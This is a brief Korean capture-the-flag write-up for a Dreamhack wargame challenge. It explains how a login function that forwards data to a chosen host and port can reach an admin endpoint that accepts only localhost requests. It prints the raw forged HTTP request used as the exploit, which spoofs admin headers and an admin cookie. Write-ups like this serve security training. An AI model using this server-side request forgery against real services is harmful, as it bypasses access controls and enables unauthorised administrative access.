https://dreamhack.io/wargame/challenges/13

분석

admin 함수

• admin 함수를 보면 127.0.0.1 에서 온 요청이지 확인함. → 무조건 서버통해서 요청해야함
• 그 외의 값은 조건에 맞게 전달하면 됨

login 함수

• data 값을 host, port 로 그대로 전달함
  • host: 127.0.0.1, port: 8000 을 세팅해야됨

진행

• 직접 요청 쿼리를 쓰긴 어려워서 postman에서 조건에 부합하게 넣어서 전달 후 raw 형태로 봄

  • raw 형태로 보려면 console → 원하는 쿼리 클릭 → 추윽 상단 show raw log

    

exploit

host: 127.0.0.1

port: 8000

data:

POST /admin HTTP/1.1
User-Agent: Admin Browser
DreamhackUser: admin
host: <http://host3.dreamhack.games:16717>
Cookie: admin=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

userid=admin